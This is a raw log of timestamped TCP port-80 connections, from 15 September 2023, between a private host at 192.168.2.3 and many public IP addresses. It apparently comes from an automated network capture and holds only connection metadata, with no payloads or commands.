                                                                                                                                                                              Sep 15, 2023 07:26:11.852535963 CEST80497723.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:11.852705002 CEST4977280192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:11.853053093 CEST4977280192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:11.959187031 CEST80497723.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:11.959234953 CEST80497723.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:11.959289074 CEST4977280192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:11.959371090 CEST4977280192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:11.961822033 CEST4977280192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:11.990434885 CEST8049771103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:11.999169111 CEST8049771103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:11.999207020 CEST8049771103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:11.999238968 CEST4977180192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:11.999275923 CEST4977180192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.012548923 CEST4977180192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.013535023 CEST4977380192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:12.020981073 CEST4977480192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.046787024 CEST4977580192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:12.069960117 CEST80497723.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.110357046 CEST8049773147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.110539913 CEST4977380192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:12.110865116 CEST4977380192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:12.172481060 CEST8049771103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.180790901 CEST8049774103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.180931091 CEST4977480192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.181197882 CEST4977480192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.184428930 CEST4977680192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:12.207815886 CEST8049773147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.241673946 CEST8049773147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.241914034 CEST4977380192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:12.242558956 CEST8049773147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.243611097 CEST4977380192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:12.293005943 CEST804977699.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.294861078 CEST4977680192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:12.312151909 CEST8049775210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.312258005 CEST4977580192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:12.382299900 CEST8049774103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.382340908 CEST8049774103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.382361889 CEST8049774103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.382455111 CEST4977480192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.503921986 CEST8049742108.167.164.216192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.504133940 CEST4974280192.168.2.3108.167.164.216
                                                                                                                                                                              Sep 15, 2023 07:26:12.545334101 CEST4977480192.168.2.3103.224.182.241
                                                                                                                                                                              Sep 15, 2023 07:26:12.558486938 CEST4977680192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:12.558496952 CEST4977580192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:12.570537090 CEST804974366.94.119.160192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.570628881 CEST4974380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:12.666773081 CEST804977699.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.666992903 CEST804977699.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.667105913 CEST4977680192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:12.705403090 CEST8049774103.224.182.241192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.739120960 CEST4977680192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:12.823928118 CEST8049775210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.826548100 CEST8049775210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.826613903 CEST4977580192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:12.847659111 CEST804977699.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.847809076 CEST804977699.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.848408937 CEST4977680192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:12.955797911 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:12.986057043 CEST804974060.43.154.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:12.986165047 CEST4974080192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:12.993000984 CEST4971080192.168.2.3137.118.26.67
                                                                                                                                                                              Sep 15, 2023 07:26:13.075963020 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.076081991 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.174263954 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.294425011 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.446994066 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.447952986 CEST4977980192.168.2.3198.100.146.220
                                                                                                                                                                              Sep 15, 2023 07:26:13.619801998 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.619900942 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.620568991 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.706820965 CEST8049746122.128.109.107192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.707194090 CEST4974680192.168.2.3122.128.109.107
                                                                                                                                                                              Sep 15, 2023 07:26:13.757976055 CEST804974896.127.180.42192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.758075953 CEST4974880192.168.2.396.127.180.42
                                                                                                                                                                              Sep 15, 2023 07:26:13.793374062 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.834037066 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.834070921 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.834091902 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.834111929 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.834115982 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.834115982 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.834147930 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.834161043 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.867580891 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.867655039 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.867733002 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.867752075 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.867769957 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.867779016 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.867789030 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.867795944 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.867808104 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.867811918 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.867831945 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.867849112 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:13.875149012 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875231028 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875236034 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875312090 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875312090 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875369072 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875447035 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875489950 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875510931 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875552893 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875566959 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875610113 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875636101 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875677109 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875750065 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875768900 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875793934 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875818968 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.875839949 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.875879049 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.995245934 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.995275021 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.995451927 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.995451927 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.999367952 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.999387980 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:13.999485016 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:13.999512911 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.006473064 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006496906 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006573915 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006596088 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006649971 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006649971 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006649971 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006649971 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006685972 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006705046 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006722927 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006738901 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006740093 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.006751060 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006773949 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.006789923 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.007800102 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.007822990 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.007941961 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.007966042 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.016223907 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.016248941 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.016405106 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.016432047 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.024776936 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.024800062 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.024844885 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.024867058 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.033030987 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.033054113 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.033098936 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.033133030 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.040361881 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040422916 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040436983 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040442944 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040472031 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040482044 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040482044 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040523052 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040668011 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040716887 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040764093 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040813923 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040836096 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040891886 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.040927887 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040986061 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.040990114 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.041024923 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.041058064 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.041075945 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.041104078 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.041126013 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.041285038 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.041333914 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.042186975 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.042208910 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.042309046 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.042330027 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.049998999 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.050021887 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.050102949 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.050112963 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.058437109 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.058489084 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.058552980 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.058573961 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.066773891 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.066886902 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.066903114 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.066966057 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.115780115 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.115808964 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.115943909 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.116023064 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.119730949 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.119796991 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.119863987 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.119863987 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.127548933 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.127573967 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.127672911 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.127686977 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.131963968 CEST4972580192.168.2.3185.15.129.58
                                                                                                                                                                              Sep 15, 2023 07:26:14.135173082 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.135224104 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.135375977 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.135389090 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.142369032 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.142436028 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.142507076 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.142534018 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.149617910 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.149641037 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.149732113 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.149755955 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.156900883 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.156948090 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.157004118 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.157016039 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.163990021 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.164011955 CEST804977774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.164091110 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.164117098 CEST4977780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:14.179341078 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179364920 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179415941 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179441929 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179487944 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179531097 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179538965 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179558992 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179578066 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179591894 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179600954 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179630995 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179637909 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179670095 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179676056 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179711103 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179728031 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179765940 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179812908 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179852009 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179908037 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.179950953 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.179995060 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.180035114 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.180068970 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.180107117 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.180212975 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.180253029 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.180274010 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.180315018 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.180377960 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.180419922 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.212938070 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213020086 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213063002 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213080883 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213109970 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213124037 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213145971 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213190079 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213226080 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213265896 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213315964 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213361025 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213396072 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213448048 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213457108 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213502884 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213536978 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213578939 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213676929 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213718891 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213762999 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213781118 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213798046 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213809013 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213816881 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213829041 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213834047 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213846922 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213867903 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213885069 CEST4977880192.168.2.3217.79.184.35
